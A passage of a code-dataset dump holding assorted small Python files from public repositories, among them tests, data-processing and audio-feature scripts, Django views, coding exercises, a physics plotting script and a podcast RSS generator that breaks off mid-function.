preprocess.get_partition(x, idx)\n comparison_1 = (pre_x_in_clusters[0] == x_in_clusters[0])\n comparison_2 = (pre_x_in_clusters[1] == x_in_clusters[1])\n self.assertTrue(comparison_1.all())\n self.assertTrue(comparison_2.all())\n comparison_3 = (pre_idx_in_clusters[0] == idx_in_clusters[0])\n comparison_4 = (pre_idx_in_clusters[1] == idx_in_clusters[1])\n self.assertTrue(comparison_3.all())\n self.assertTrue(comparison_4.all())\n except 
Exception:\n self.assertTrue(False)\n\n# ------------------------------------------------------------------------------\n","repo_name":"kamilazdybal/PCAfold","sub_path":"tests/preprocess/test_preprocess__get_partition.py","file_name":"test_preprocess__get_partition.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"24955187810","text":"import pandas as pd\n\n\ndef get_column_names(agencies):\n if len(agencies) == 0:\n column_names = ['Zipcode']\n\n elif len(agencies[0]) == 4: # Check length of entry to determine whether or not to include email\n column_names = [\"Name\", \"Address\", \"Number\", \"Zipcode\"]\n\n elif len(agencies[0]) == 5:\n column_names = [\"Name\", \"Address\", \"Number\", \"Email\", \"Zipcode\"]\n\n else:\n raise ValueError('Problem with creating column names.')\n\n return column_names\n\n\ndef create_dataframe(agencies):\n column_names = get_column_names(agencies)\n df = pd.DataFrame(agencies, columns=column_names)\n return df\n\n\ndef save_dataframe(df, data_path):\n df.to_csv(data_path, index=False)\n\n\ndef load_dataframe(data_path):\n try:\n df = pd.read_csv(data_path)\n except FileNotFoundError:\n print(\"No file exists. Creating blank dataframe.\")\n agencies = []\n df = create_dataframe(agencies)\n\n return df\n\n\ndef dataframe_to_list(df):\n agencies = []\n\n columns = list(df)\n\n for index, row in df.iterrows():\n entry = []\n\n for column in columns:\n entry.append(row[column])\n\n agencies.append(entry)\n\n return agencies\n\n\ndef get_number_completed(df):\n number_completed = len(df['Zipcode'].unique())\n print(\"Number completed: \" + str(number_completed))\n return number_completed\n\n\n\n","repo_name":"evan-fannin/carrier-agent-scraper","sub_path":"carrier_agent_scraper/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898488464","text":"#!/usr/bin/env python3\n# coding: utf8\n\nimport numpy as np\nimport pandas as pd\nimport soundfile as sf\nfrom sklearn import preprocessing\nimport python_speech_features as spefeat\nimport librosa.core as libcore\n\nfrom tools import *\nfrom constants import AUDIO_DIR, AUDIO, SPEAKER_ID\nfrom segment import segment_audio, split_in_windows\n\n\ndef extract_with_mfcc(audio: np.array, samplerate: int):\n \"\"\"\n Extracts audio characteristics using LPC\n\n :param audio: (np.array) audio to be extracted\n :param samplerate: (int) corresponding to the samplerate of audio\n :return: characteristics of the signal\n \"\"\"\n\n features = spefeat.mfcc(audio, samplerate)\n\n return preprocessing.scale(features)\n\n\ndef extract_with_lpc(audio: np.array, samplerate: int):\n \"\"\"\n Extracts audio characteristics using LPC\n\n :param audio: (np.array) audio to be extracted\n :param samplerate: (int) corresponding to the samplerate of audio\n :return: characteristics of the signal\n \"\"\"\n\n windows = split_in_windows(audio, samplerate)\n\n # for each window, get the coefficients of the LPC\n features = np.array([\n libcore.lpc(window, 12) for window in windows\n ])\n\n return preprocessing.scale(features)\n\n\ndef extract_with_plp(audio: np.array, _: int):\n \"\"\"\n Extracts audio characteristics using PLP\n\n :param audio: (np.array) audio to be extracted\n :param _: (int) corresponding to the samplerate of audio\n :return: characteristics of the signal\n \"\"\"\n\n 
pass\n\n\n@get_function_duration\n@get_function_memory_consumption\ndef extract_features(\n data: pd.DataFrame, extract, multi: bool = True,\n audio_dir: str = AUDIO_DIR) -> (list, list):\n \"\"\"\n Generic function to perform feature extraction,\n independently of the extraction method\n\n :param data: (pd.DataFrame) contains the detail of each sample\n :param extract: (Function) extraction method to use\n :param multi: (bool) specify if several samples can be extract\n from one audio file\n :param audio_dir: (str) directory where the audio files are located\n :return: (features:list, labels:list)\n \"\"\"\n features = []\n speakers = []\n\n for index, row in data.iterrows():\n audio_name = row.loc[AUDIO]\n speaker = row.loc[SPEAKER_ID]\n audio, samplerate = sf.read(audio_dir + audio_name)\n audio_extracts = segment_audio(audio, samplerate)\n\n if not multi:\n audio_extracts = audio_extracts[0:1]\n\n for audio_extract in audio_extracts:\n # extract the features using the given extraction function\n features.append(extract(audio_extract, samplerate))\n speakers.append(speaker)\n\n return features, speakers\n\n\nif __name__ == '__main__':\n audio, sp = sf.read(\"database/dev/audio/aahtm.flac\")\n sp_audio = segment_audio(audio, sp)\n lpc = extract_with_lpc(audio, sp)\n","repo_name":"laurenttainturier/voice_recognition","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16144165441","text":"#Declaramos una lista\n\nalumnas = ['Hannah','Ariana','Malaika']\nalumnos = ['Iker','Andrés','Leonardo']\n\n#Ciclo for\n\n#Recorre los índices de la lista uno a uno.\nfor x in alumnas: \n\tprint(x)\n\tfor y in alumnos:\n\t\tprint(x,y)\n\n","repo_name":"arianafm/Python","sub_path":"Básico/Clase2/cicloFor.py","file_name":"cicloFor.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70473038567","text":"import os, glob, string\n\nruta = raw_input(\"Carpeta con ficheros a renombrar: \")\n#fecha = raw_input(\"introduzca el la fecha de la imagen (yyyy/mm/dd): \")\n\nindice = string.find(ruta, \"\\\\\", -21)\nescena = ruta[indice+1:]\n\nsat = escena[8:10].upper()\npath = escena[-6:-3]\nrow = \"0\" + escena[-2:]\nyear = escena[:4]\nmonth = escena[4:6]\nday = escena[6:8]\nsensor = escena[10:-6].lower()\n\n\n\nos.chdir(ruta)\narchivosimg=glob.glob('*.TIF')\narchivostxt=glob.glob('*.txt')\n\nfor fileimg in archivosimg:\n \n if \"_B7\" in fileimg or \"_B8\" in fileimg:\n os.rename(fileimg, sat + \"2\" + path + row + \"_\" + row + year + month + day + \"_\" + fileimg[-6:-4] + \"0\" + \".TIF\")\n elif \"_VCID_2\" in fileimg:\n os.rename(fileimg, sat + \"2\" + path + row + \"_\" + row + year + month + day + \"_\" + fileimg[-13:-11] + \"2\" + \".TIF\")\n elif \"_VCID_1\" in fileimg:\n os.rename(fileimg, sat + \"1\" + path + row + \"_\" + row + year + month + day + \"_\" + fileimg[-13:-11] + \"1\" + \".TIF\")\n else:\n os.rename(fileimg, sat + \"1\" + path + row + \"_\" + row + year + month + day + \"_\" + fileimg[-6:-4] + \"0\" + \".TIF\")\n \nfor filetxt in archivostxt:\n \n if \"_GCP\" in filetxt:\n os.rename(filetxt, sat + \"1\" + path + row + \"_\" + row + year + month + day + \"_\" + \"GCP\" + \".txt\")\n elif \"_MTL\" in filetxt:\n os.rename(filetxt, sat + \"1\" + path + row + \"_\" + row + year + month + day + \"_\" + \"MTL\" + 
\".txt\")","repo_name":"LAST-EBD/Protocolo","sub_path":"Landsat_Scripts/Rename_Gapfill.py","file_name":"Rename_Gapfill.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70042752169","text":"# Allow Ctrl-C to abort all tasks submitted to a multiprocessing Pool.\n# Any existing tasks will still run to completion, but any pending\n# tasks will exit immediately. See https://stackoverflow.com/a/68695455/5495732\n#\n# Usage:\n# from interrupt import handle_ctrl_c, init_pool\n#\n# @handle_ctrl_c\n# def task_function(args):\n# # ...\n#\n# # In main:\n# signal.signal(signal.SIGINT, signal.SIG_IGN)\n# pool = Pool(num_threads, initializer=init_pool)\n#\n# # Submit tasks to pool here\n# \n# results = pool.map(task_function, process_args)\n# if any(map(lambda x: isinstance(x, KeyboardInterrupt), results)):\n# print('Ctrl-C was entered.')\n# exit(1)\n# pool.close()\n# pool.join() \n\nimport signal\n\nfrom functools import wraps\n\ndef handle_ctrl_c(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n global ctrl_c_entered\n if not ctrl_c_entered:\n signal.signal(signal.SIGINT, default_sigint_handler) # the default\n try:\n return func(*args, **kwargs)\n except KeyboardInterrupt:\n ctrl_c_entered = True\n return KeyboardInterrupt()\n finally:\n signal.signal(signal.SIGINT, pool_ctrl_c_handler)\n else:\n return KeyboardInterrupt()\n return wrapper\n\ndef pool_ctrl_c_handler(*args, **kwargs):\n global ctrl_c_entered\n ctrl_c_entered = True\n\ndef init_pool():\n # set global variable for each process in the pool:\n global ctrl_c_entered\n global default_sigint_handler\n ctrl_c_entered = False\n default_sigint_handler = signal.signal(signal.SIGINT, pool_ctrl_c_handler)\n\n","repo_name":"akirmse/mountains","sub_path":"scripts/interrupt.py","file_name":"interrupt.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"15731274714","text":"# Write a Python script to concatenate following dictionaries to create a new one.\n\ndict1 = {'name': 'jay','python': 85, 'marks': 60}\ndict2 = {'php': 'avinash','java': 190, 'cpp': 40}\ndict3 = {'city': 'lunawada','nord.js': 78, '.net': 80}\n\nconcate_dic = {}\n\nfor i in (dict1,dict2,dict3):\n concate_dic.update(i)\n\nprint(concate_dic)","repo_name":"pateljay2114/jay_patel","sub_path":"python/assignment/module - 3/34.Write a Python script to concatenate following dictionaries to create a new one.py","file_name":"34.Write a Python script to concatenate following dictionaries to create a new one.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37753524617","text":"class Restaurant():\n\t\"\"\"Simple Restaurant information.\"\"\"\n\n\tdef __init__(self, restaurant_name, cuisine_type):\n\t\t\"\"\"Initializes attributes\"\"\"\n\t\tself.restaurant_name = restaurant_name\n\t\tself.cuisine_type = cuisine_type\n\n\tdef describe_restaurant(self):\n\t\t\"\"\"Describes a restaurant\"\"\"\n\t\tprint(\"Name: \" + self.restaurant_name.title() +\n\t\t\", Cuisine Type: \" + self.cuisine_type.title())\n\n\tdef open_restaurant(self):\n\t\t\"\"\"Displays open message.\"\"\"\n\t\tprint(self.restaurant_name.title() + \" is now open.\")\n\nrestaurant_1 = Restaurant('Reddmiamor', 'Venezuelan')\nrestaurant_2 = Restaurant('LeFran', 'Italian')\nrestaurant_3 = Restaurant('YoshNoFui', 
'Peruvian')\n\nrestaurant_1.describe_restaurant()\nrestaurant_1.open_restaurant()\nrestaurant_2.describe_restaurant()\nrestaurant_3.describe_restaurant()\n\n\nclass User():\n\n\tdef __init__(self, first_name, last_name, age, weight, height):\n\t\t\"\"\"Initializes attributes\"\"\"\n\t\tself.first_name = first_name\n\t\tself.last_name = last_name\n\t\tself.age = age\n\t\tself.weight = weight\n\t\tself.height = height\n\n\tdef describe_user(self):\n\t\t\"\"\"Describes user.\"\"\"\n\t\tprint(\n\t\t\t\"Name: \" + self.first_name.title() +\n\t\t\t\"\\nLast Name: \" \t+ self.last_name.title() +\n\t\t\t\"\\nAge: \" + str(self.age) +\n\t\t\t\"\\nWeight: \"+ str(self.weight) + \"Kg\"\n\t\t\t\"\\nHeight: \" + str(self.height) + \"m\"\n\t\t\t)\n\n\tdef greet_user(self):\n\t\t\"\"\"Says hello to an user.\"\"\"\n\t\tprint(\"Hello \" + self.first_name.title() + \" \" +\n\t\tself.last_name.title() + \"!\")\n\nprueba = User(\"Reddmar\", \"quevedo\", 29, 95, 1.80)\n\nprueba.describe_user()\nprueba.greet_user()","repo_name":"Akaidmaru/random_python","sub_path":"Basic_Coding/classes_practice.py","file_name":"classes_practice.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24387657055","text":"from django.shortcuts import render\nfrom tweepy import OAuthHandler\nfrom tweepy import API\nfrom tweepy import Cursor\nfrom datetime import datetime, date, time, timedelta\nfrom collections import Counter\nfrom django.http import HttpResponse\nfrom . models import Tweets\n\n\n\n# Create your views here.\nconsumer_key=\"api_key\"\nconsumer_secret=\"api_secret_key\"\naccess_token=\"access_token\"\naccess_token_secret=\"access_token_secret\"\n\nauth = OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\nauth_api = API(auth,wait_on_rate_limit=True)\n\nusername=[\"Cristiano\",\"BarackObama\",\"rihanna\",\"TheRock\"]\n\n\n\ndef index(request):\n tweet_count = 0\n for i in username:\n try:\n for status in Cursor(auth_api.user_timeline, id=i).items():\n tweet_count = tweet_count + 1\n if status.created_at.year == 2021 and status.created_at.month == 5:\n tweets_save= Tweets.objects.create(username=i,tweet_number=tweet_count,created_at=status.created_at.day,time=status.created_at.hour,retweet_count=status.retweet_count)\n tweets_save.save()\n except:\n pass\n return HttpResponse('
    Loaded Tweets Data
    ')\n","repo_name":"Chukslord1/Arctype_Tweets_Heatmap","sub_path":"App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24602684893","text":"from django.http import Http404\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom .models import Cattle, Entry\nfrom .forms import notifyform\n\n\ndef home(request):\n\tall_blog = Entry.objects.all()[0:5]\n\n\treturn render(request, \"index.html\" , {'all_blog': all_blog})\n\t\n\ndef log_in(request):\n\treturn render(request, \"login.html\",{})\n\ndef cattlepage(request):\n\tall_cattle = Cattle.objects.all()\n\n\tcontext = {\n\t\t'all_cattle' : all_cattle,\n\t\t\n\t}\n\treturn render(request,'cattlepage.html', context)\n\n\ndef cattle_section(request,cattle_Id):\n\t\n\ttry:\n\t\tcattle_data = Cattle.objects.get(pk = cattle_Id)\n\texcept Cattle.DoesNotExist:\n\t\traise Http404(\"The Cattle info doesn't exist\")\n\tcontext = {\n\t\t'cattle_data' : cattle_data,\n\t\t\t}\n\treturn render(request, \"cattle_data.html\",context)\n\ndef notifypage(request):\n\tform = notifyform(request.POST or None)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\treturn HttpResponseRedirect('/')\n\tcontext = {\n\t\t'form': form\n\t}\n\treturn render(request, 'notifyentry.html',context)","repo_name":"AshwinJd/Organic-Dairy-Farm","sub_path":"cattle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14216212852","text":"import sys\n# from collections import Counter\n\n\ndef max_occur_char(s):\n count = {}\n max_count = -sys.maxsize\n max_char = ''\n for c in s:\n if c in count:\n count[c] += 1\n else:\n count[c] = 1\n if count[c] > max_count:\n max_count = count[c]\n max_char = c\n return max_char, max_count\n\n\n# def max_occur_char(s):\n# counter = Counter(s)\n# max_count = -sys.maxsize\n# max_char = ''\n# for ch, count in counter.items():\n# if count > max_count:\n# max_count = count\n# max_char = ch\n# return max_char, max_count\n\n\nprint(max_occur_char('thequickbrownfoxjumpsover'))\n","repo_name":"vpc20/python-strings-and-things","sub_path":"MaxOccuringChar.py","file_name":"MaxOccuringChar.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10125441035","text":"\"\"\"Given the head of a singly linked list, reverse the list, and return the reversed list.\n\n \n\nExample 1:\n\n\nInput: head = [1,2,3,4,5]\nOutput: [5,4,3,2,1]\nExample 2:\n\n\nInput: head = [1,2]\nOutput: [2,1]\nExample 3:\n\nInput: head = []\nOutput: []\n \n\nConstraints:\n\nThe number of nodes in the list is the range [0, 5000].\n-5000 <= Node.val <= 5000\"\"\"\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n if not head:\n return head\n if not head.next:\n return head\n stack = []\n cur = head\n while cur.next:\n stack.append(cur)\n cur = cur.next\n start = cur\n while stack:\n cur.next = stack.pop()\n cur = cur.next\n cur.next = None\n return 
start","repo_name":"nicokuzak/leetcode","sub_path":"easy/reverse_linked_list.py","file_name":"reverse_linked_list.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30876773543","text":"#example script which looks a linearly coupled beam as seen by two bpms\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n####Independent Horizontal and Vertical, tilted bpms\n#particle oscillates independently in two planes\nQx = 6.7421\nQy = 6.8776\ntnum = 10000\nt = np.arange(tnum)\n#x,y at first bpm\nx1 = np.cos(2*np.pi*Qx*t)\ny1 = np.sin(2*np.pi*Qy*t)\n#x,y at second bpm\nbpm21_phase = np.pi/2.0\nx2 = np.cos(2*np.pi*Qx*t+bpm21_phase)\ny2 = np.sin(2*np.pi*Qy*t+bpm21_phase)\n\n#each bpm has a tilt which mixes the two degrees of freedom.\nbpm1_tilt = 5.0*(np.pi/180.0)\nbpm2_tilt = -15.0*(np.pi/180.0)\nbpm_x1 = np.cos(bpm1_tilt)*x1 + np.sin(bpm1_tilt)*y1\nbpm_y1 = -np.sin(bpm1_tilt)*x1 + np.cos(bpm1_tilt)*y1\nbpm_x2 = np.cos(bpm1_tilt)*x2 + np.sin(bpm1_tilt)*y2\nbpm_y2 = -np.sin(bpm1_tilt)*x2 + np.cos(bpm1_tilt)*y2\n\n#plot x1 vs x2 as seen by bpms over 100 turns\nplt.scatter(bpm_x1[0:100],bpm_x2[0:100])\nplt.xlabel('X at BPM1')\nplt.ylabel('X at BPM2')\nplt.title('x2 vs x1 from BPMs, all data')\nplt.savefig('lec3_poincare_1.png', bbox_inches='tight')\nplt.show()\n\n#plot x1 vs x2 as seen by bpms over 10000 turns, but only when y1 = 0, y2 > 0\npoincare_y = np.logical_and( (np.abs(bpm_y1-0) <0.05), bpm_y2 > 0)\nplt.scatter(bpm_x1[poincare_y],bpm_x2[poincare_y])\nplt.xlabel('X at BPM1')\nplt.ylabel('X at BPM2')\nplt.title('x2 vs x1 from BPMs, y1 = 0, y2>0')\nplt.savefig('lec3_poincare_2.png', bbox_inches='tight')\nplt.show()\n\n####Linearly Coupled Horizontal and Vertical, precise bpms\n#tunes\nQx = 0.78\nQy = 0.80\n#linear coupling resonance parameters\nG = 0.05\nlam = np.sqrt((Qx-Qy)**2 + G**2)\ndelt = np.abs(Qx-Qy)\nQ = G/(lam+delt)\nQa = 1/(1+Q**2)\nQb = Q/(1+Q**2)\n#linearly coupled tunes\nQp = 0.5*(Qx+Qy)+0.5*lam\nQm = 0.5*(Qx+Qy)-0.5*lam\ncp = np.cos(2*np.pi*Qp)\nsp = np.sin(2*np.pi*Qp)\ncm = np.cos(2*np.pi*Qm)\nsm = np.sin(2*np.pi*Qm)\n\n\n#transfer matrices for linear couppling\nU = np.matrix([[Qa, 0, Qb, 0], [0, Qa, 0, Qb], [-Qb, 0, Qa, 0], [0, -Qb, 0, Qa]])\nR = np.matrix([[cp, sp, 0, 0], [-sp, cp, 0, 0], [0, 0, cm, sm], [0, 0, -sm, cm]])\nM=np.matmul(R,U)\nM=np.matmul(np.linalg.inv(U),M)\n\ntnum = 10000\nx = np.zeros((tnum,4))\n#this vector represents x1, x2, y1, y2\nx[0,:] = [1,0,0,0]\n#calculate vector of tnum turns\nfor lp in range(1,tnum):\n x[lp,:] = np.dot(M,x[(lp-1),:])\n\n#plot x1 vs x2 as seen by bpms over 1000 turns\nplt.scatter(x[0:1000,0],x[0:1000,1])\nplt.xlabel('X at BPM1')\nplt.ylabel('X at BPM2')\nplt.title('x2 vs x1 with Coupling, all data')\nplt.savefig('lec3_poincare_3.png', bbox_inches='tight')\nplt.show()\n\n#plot x1 vs x2 as seen by bpms over 10000 turns, but only when y1 = 0, y2 > 0\npoincare_y = np.logical_and( (np.abs(x[:,2]-0) <0.05), (np.abs(x[:,3]-0) <0.05))\nplt.scatter(x[poincare_y,0],x[poincare_y,1])\nplt.xlabel('X at BPM1')\nplt.ylabel('X at BPM2')\nplt.title('x2 vs x1 with Coupling, y1 = 0, y2 = 0')\nplt.savefig('lec3_poincare_4.png', bbox_inches='tight')\nplt.show()\n","repo_name":"jseldred/USPAS_Python_2022","sub_path":"lectures/lec3_poincare.py","file_name":"lec3_poincare.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9203529616","text":"import 
torch.nn as nn\n\nfrom cherry_rl.algorithms.nn.conv_encoders import init, cnn_forward\n\n\nclass Encoder(nn.Module):\n def __init__(self, layer_norm=False):\n super().__init__()\n\n gain = nn.init.calculate_gain('relu')\n self.conv = nn.Sequential(\n init(nn.Conv2d(4, 32, kernel_size=3, stride=2, padding=1), gain=gain), nn.ReLU(),\n init(nn.Conv2d(32, 32, kernel_size=3, stride=2, padding=1), gain=gain), nn.ReLU(),\n init(nn.Conv2d(32, 32, kernel_size=3, stride=2, padding=1), gain=gain), nn.ReLU(),\n init(nn.Conv2d(32, 32, kernel_size=3, stride=2, padding=1), gain=gain), nn.ReLU(),\n )\n self.linear = nn.Sequential(\n init(nn.Linear(32 * 6 * 6, 512), gain=gain), nn.ReLU()\n )\n self.layer_norm = None\n if layer_norm:\n self.layer_norm = nn.LayerNorm(512)\n\n def forward(self, observation):\n cnn_out = cnn_forward(self.conv, observation)\n linear_out = self.linear(cnn_out)\n if self.layer_norm is not None:\n linear_out = self.layer_norm(linear_out)\n return linear_out\n","repo_name":"CherryPieSexy/rl_mario","sub_path":"src/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"40195955844","text":"from django.contrib import admin\r\nfrom django.urls import path, include\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('nosotros/', views.nosotros, name='nosotros'),\r\n path('servicios/', views.servicios, name='servicios'),\r\n path('contacto/', views.contacto, name='contacto'),\r\n path('reserva/', views.reserva, name='reserva'),\r\n path('inventario/', views.inventario, name='inventario'),\r\n\r\n\r\n]\r\n","repo_name":"nadiadecar/Pagina_web","sub_path":"tarea-3-grupo-16/Tarea2/peluqueria/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23959191164","text":"#!/usr/bin/env python3\n\nclass Animal(object):\n __slots__ = ('name', 'age') # 限定 Animal 类只能定义 name 和 age 属性\n\n\nclass Cat(Animal):\n __slots__ = ('address')\n\n\ndog = Animal()\ndog.name = 'wangcai'\ndog.age = 2\n# dog.gender = 'male' # dog 是 Animal 的实例化对象,无法定义 gender 属性\n\"\"\"\n^^^报错\ndog.gender = 'male' # dog 是 Animal 的实例化对象,无法定义 gender 属性\nAttributeError: 'Animal' object has no attribute 'gender'\n\"\"\"\n\ncat = Cat()\ncat.gender = 'male' # 无法定义 gender 属性\ncat.address = 'chengdu'\ncat.name = 'tom' # 由于 Cat 继承的是 Animal 所以可以定义 name 属性\n\"\"\"\n^^^报错\ncat.gender = 'male' # 无法定义 gender 属性\nAttributeError: 'Cat' object has no attribute 'gender'\n\"\"\"\n","repo_name":"Achang0121/achangPython","sub_path":"animal_2.py","file_name":"animal_2.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3127640178","text":"from xml.etree.ElementTree import Element, SubElement\nfrom xml.etree import ElementTree\nimport boto3, os, time\nfrom xml.dom import minidom\nimport urllib\n\n# import environment variables #########################################################################################\ncloudfront_content = os.environ['cloudfront_content'] # content cloudfront url\npodcast_name = os.environ['podcast_name'] # podcast name\npodcast_subtitle = os.environ['podcast_subtitle'] # podcast subtitle\npodcast_author = os.environ['podcast_author'] # podcast author\npodcast_desc = os.environ['podcast_desc'] # podcast 
description\npodcast_url = os.environ['podcast_url'] # feed url\npodcast_img_url = os.environ['podcast_img_url'] # link to podcast image url\npodcast_type = os.environ['podcast_type'] # type of podcast\npodcast_xml_file_name = os.environ['podcast_xml_file_name'] # ex. podcast.xml\ns3_bucket_trigger = os.environ['s3_bucket_trigger'] # trigger bucket name here\ns3_bucket_rss = os.environ['s3_bucket_rss'] # xml host bucket name here\nemail = os.environ['email'] # email here\ncopyright_text = os.environ['copyright_text'] # copyright text here\nlanguage = os.environ['language'] # ex. en-us\nwebsite = os.environ['website'] # www.example.com\ncategory_one = os.environ['category_one'] # category\nsub_category_one = os.environ['sub_category_one'] # subcategory\ncategory_two = os.environ['category_two'] # category two\nsub_category_two = os.environ['sub_category_two'] # subcategory two\nexplicit = os.environ['explicit'] # yes, no\n\n# reformat the xml #####################################################################################################\n\n\ndef prettify(elem):\n \"\"\"Return a pretty-printed XML string for the Element.\n \"\"\"\n rough_string = ElementTree.tostring(elem)\n reparsed = minidom.parseString(rough_string)\n return reparsed.toprettyxml(indent=\"\\t\", newl=\"\\n\", encoding='UTF-8')\n\n# create the XML document root #########################################################################################\n\n\ndef make_feed():\n \"\"\"Generate xml file\n \"\"\"\n rss = Element('rss', version='2.0')\n # headers ##########################################################################################################\n rss.set('xmlns:atom', 'http://www.w3.org/2005/Atom')\n rss.set('xmlns:itunes', 'http://www.itunes.com/dtds/podcast-1.0.dtd')\n rss.set('xmlns:content', 'http://purl.org/rss/1.0/modules/content/')\n rss.set('xmlns:googleplay', 'http://www.google.com/schemas/play-podcasts/1.0')\n # channel - podcast defined here ###################################################################################\n channel = SubElement(rss, 'channel')\n SubElement(channel, 'generator').text = \"https://github.com/goehlemichael/terraform-podcast\"\n SubElement(channel, 'title').text = podcast_name\n SubElement(channel, 'itunes:subtitle').text = podcast_subtitle\n SubElement(channel, 'atom:link', href=podcast_url, rel='self', type='application/rss+xml')\n SubElement(channel, 'link',).text = website\n SubElement(channel, 'itunes:author').text = podcast_author\n SubElement(channel, 'itunes:explicit').text = explicit\n SubElement(channel, 'description').text = podcast_desc\n SubElement(channel, 'itunes:type').text = podcast_type\n # channel - owner ##################################################################################################\n owner = SubElement(channel, 'itunes:owner')\n SubElement(owner, 'itunes:name').text = podcast_name\n SubElement(owner, 'itunes:email').text = email\n SubElement(channel, 'managingEditor').text = email\n SubElement(channel, 'webMaster').text = email\n # END owner ########################################################################################################\n SubElement(channel, 'itunes:summary').text = podcast_desc\n SubElement(channel, 'itunes:image', href=podcast_img_url)\n # Category #########################################################################################################\n category = SubElement(channel, 'itunes:category', text=category_one)\n SubElement(category, 'itunes:category', text=sub_category_one)\n # END 
category 1####################################################################################################\n # category two #####################################################################################################\n category_two_rss = SubElement(channel, 'itunes:category', text=category_two)\n SubElement(category_two_rss, 'itunes:category', text=sub_category_two)\n # end category two #################################################################################################\n SubElement(channel, 'language').text = language\n SubElement(channel, 'copyright').text = copyright_text\n SubElement(channel, 'lastBuildDate').text = time.strftime(\"%a, %d %b %Y %H:%M:%S %z\")\n SubElement(channel, 'pubDate').text = time.strftime(\"%a, %d %b %Y %H:%M:%S %z\")\n # channel - image ##################################################################################################\n image = SubElement(channel, 'image')\n SubElement(image, 'url').text = podcast_img_url\n SubElement(image, 'title').text = podcast_name\n SubElement(image, 'link').text = podcast_url\n # END image ########################################################################################################\n\n s3_bucket_object = boto3.client('s3')\n content_list = s3_bucket_object.list_objects_v2(Bucket=s3_bucket_trigger)\n\n # for each object in the bucket create relevant xml tags ###########################################################\n def get_episode_info(each_s3_object, cloudfront_content):\n episode_folder, episode_title = each_s3_object['Key'].split('/')\n\n # retrieve publish date ########################################################################################\n publish_date_url = cloudfront_content + urllib.parse.quote(episode_folder + '/pubdate.txt')\n publish_date = urllib.request.urlopen(publish_date_url).read().decode('utf-8')\n\n # retrieve episode image #######################################################################################\n episode_image_url = cloudfront_content + urllib.parse.quote(episode_folder + '/image.jpeg')\n\n # retrieve episode duration ####################################################################################\n duration_url = cloudfront_content + urllib.parse.quote(episode_folder + '/duration.txt')\n duration = urllib.request.urlopen(duration_url).read().decode('utf-8')\n\n # retrieve episode description #################################################################################\n description_url = cloudfront_content + urllib.parse.quote(episode_folder + '/description.txt')\n description_text = urllib.request.urlopen(description_url).read().decode('utf-8')\n\n # retrieve episode title #######################################################################################\n title_url = cloudfront_content + urllib.parse.quote(episode_folder + '/title.txt')\n title_text = urllib.request.urlopen(title_url).read().decode('utf-8')\n\n # retrieve episode type ########################################################################################\n episode_type_url = cloudfront_content + urllib.parse.quote(episode_folder + '/episodetype.txt')\n episode_type_text = urllib.request.urlopen(episode_type_url).read().decode('utf-8')\n\n # build XML item element #######################################################################################\n item = SubElement(channel, 'item')\n SubElement(item, 'description').text = description_text\n SubElement(item, 'itunes:image', href=episode_image_url)\n SubElement(item, 'title').text = title_text\n 
